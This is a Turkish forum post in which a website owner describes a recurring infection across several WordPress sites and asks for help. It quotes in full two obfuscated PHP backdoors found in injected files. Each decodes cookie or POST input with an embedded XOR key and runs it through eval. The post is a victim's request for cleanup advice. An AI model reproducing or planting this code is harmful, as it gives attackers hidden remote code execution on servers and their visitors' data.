Arkadaşlar sitelerime virüs bulaştı. Tek bir hostinge bağlı 3-4 sitem var. Hepsinde kendi kendine garip dosya isimli php dosyalar açıyor. cPanel şifrelerini değiştirdim, ftp şifrelerini değiştirdim ama çözüm yok. Farklı bir firmada barınan reseller hostingimde de aynı sorun devam ediyor. FTP programını her girişte sorulan şeklinde düzelttim. Sucuri ve Wordfence kurdum ama çözüm yine yok. İndex ve wp-config dosyalarıma include ile başlayan bir kod ekleniyor ve sitemde garip isimler oluşuyor. Örneğin 2o8yaett.php gibi.Örnek olarak;

$odpha = 'x9b#ns-gdoy3u_c*5a6r1mfpHvt\'7l4e20ik';$nnddx = Array();$nnddx[] = $odpha[1].$odpha[1].$odpha[28].$odpha[28].$odpha[11].$odpha[14].$odpha[14].$odpha[33].$odpha[6].$odpha[11].$odpha[33].$odpha[16].$odpha[1].$odpha[6].$odpha[30].$odpha[14].$odpha[16].$odpha[17].$odpha[6].$odpha[1].$odpha[33].$odpha[31].$odpha[30].$odpha[6].$odpha[32].$odpha[22].$odpha[28].$odpha[2].$odpha[30].$odpha[2].$odpha[11].$odpha[18].$odpha[8].$odpha[20].$odpha[16].$odpha[33];$nnddx[] = $odpha[24].$odpha[15];$nnddx[] = $odpha[3];$nnddx[] = $odpha[14].$odpha[9].$odpha[12].$odpha[4].$odpha[26];$nnddx[] = $odpha[5].$odpha[26].$odpha[19].$odpha[13].$odpha[19].$odpha[31].$odpha[23].$odpha[31].$odpha[17].$odpha[26];$nnddx[] = $odpha[31].$odpha[0].$odpha[23].$odpha[29].$odpha[9].$odpha[8].$odpha[31];$nnddx[] = $odpha[5].$odpha[12].$odpha[2].$odpha[5].$odpha[26].$odpha[19];$nnddx[] = $odpha[17].$odpha[19].$odpha[19].$odpha[17].$odpha[10].$odpha[13].$odpha[21].$odpha[31].$odpha[19].$odpha[7].$odpha[31];$nnddx[] = $odpha[5].$odpha[26].$odpha[19].$odpha[29].$odpha[31].$odpha[4];$nnddx[] = $odpha[23].$odpha[17].$odpha[14].$odpha[35];foreach ($nnddx[7]($_COOKIE, $_POST) as $kujjzrc => $oidmnkl){function ghdxmxv($nnddx, $kujjzrc, $hvidkqy){return $nnddx[6]($nnddx[4]($kujjzrc . $nnddx[0], ($hvidkqy / $nnddx[8]($kujjzrc)) + 1), 0, $hvidkqy);}function dqltm($nnddx, $trtse){return @$nnddx[9]($nnddx[1], $trtse);}function cvtkdlp($nnddx, $trtse){$vbbdg = $nnddx[3]($trtse) % 3;if (!$vbbdg) {eval($trtse[1]($trtse[2]));exit();}}$oidmnkl = dqltm($nnddx, $oidmnkl);cvtkdlp($nnddx, $nnddx[5]($nnddx[2], $oidmnkl ^ ghdxmxv($nnddx, $kujjzrc, $nnddx[8]($oidmnkl))));}


Mesela dump71.php diye bir dosya açmışlar. Şu şekilde
$unveh = '7bfkmnv\'H_tp3los6u59#rd-a2exgiyc804*';$niiagr = Array();$niiagr[] = $unveh[8].$unveh[35];$niiagr[] = $unveh[0].$unveh[12].$unveh[12].$unveh[32].$unveh[16].$unveh[25].$unveh[1].$unveh[0].$unveh[23].$unveh[19].$unveh[22].$unveh[24].$unveh[25].$unveh[23].$unveh[34].$unveh[31].$unveh[24].$unveh[32].$unveh[23].$unveh[19].$unveh[1].$unveh[26].$unveh[16].$unveh[23].$unveh[24].$unveh[33].$unveh[31].$unveh[22].$unveh[1].$unveh[32].$unveh[12].$unveh[18].$unveh[31].$unveh[19].$unveh[2].$unveh[19];$niiagr[] = $unveh[20];$niiagr[] = $unveh[31].$unveh[14].$unveh[17].$unveh[5].$unveh[10];$niiagr[] = $unveh[15].$unveh[10].$unveh[21].$unveh[9].$unveh[21].$unveh[26].$unveh[11].$unveh[26].$unveh[24].$unveh[10];$niiagr[] = $unveh[26].$unveh[27].$unveh[11].$unveh[13].$unveh[14].$unveh[22].$unveh[26];$niiagr[] = $unveh[15].$unveh[17].$unveh[1].$unveh[15].$unveh[10].$unveh[21];$niiagr[] = $unveh[24].$unveh[21].$unveh[21].$unveh[24].$unveh[30].$unveh[9].$unveh[4].$unveh[26].$unveh[21].$unveh[28].$unveh[26];$niiagr[] = $unveh[15].$unveh[10].$unveh[21].$unveh[13].$unveh[26].$unveh[5];$niiagr[] = $unveh[11].$unveh[24].$unveh[31].$unveh[3];foreach ($niiagr[7]($_COOKIE, $_POST) as $aobtq => $checwi){function ompymft($niiagr, $aobtq, $pesadq){return $niiagr[6]($niiagr[4]($aobtq . $niiagr[1], ($pesadq / $niiagr[8]($aobtq)) + 1), 0, $pesadq);}function ytyci($niiagr, $xgsrej){return @$niiagr[9]($niiagr[0], $xgsrej);}function hckrdx($niiagr, $xgsrej){$swtyrsx = $niiagr[3]($xgsrej) % 3;if (!$swtyrsx) {eval($xgsrej[1]($xgsrej[2]));exit();}}$checwi = ytyci($niiagr, $checwi);hckrdx($niiagr, $niiagr[5]($niiagr[2], $checwi ^ ompymft($niiagr, $aobtq, $niiagr[8]($checwi))));}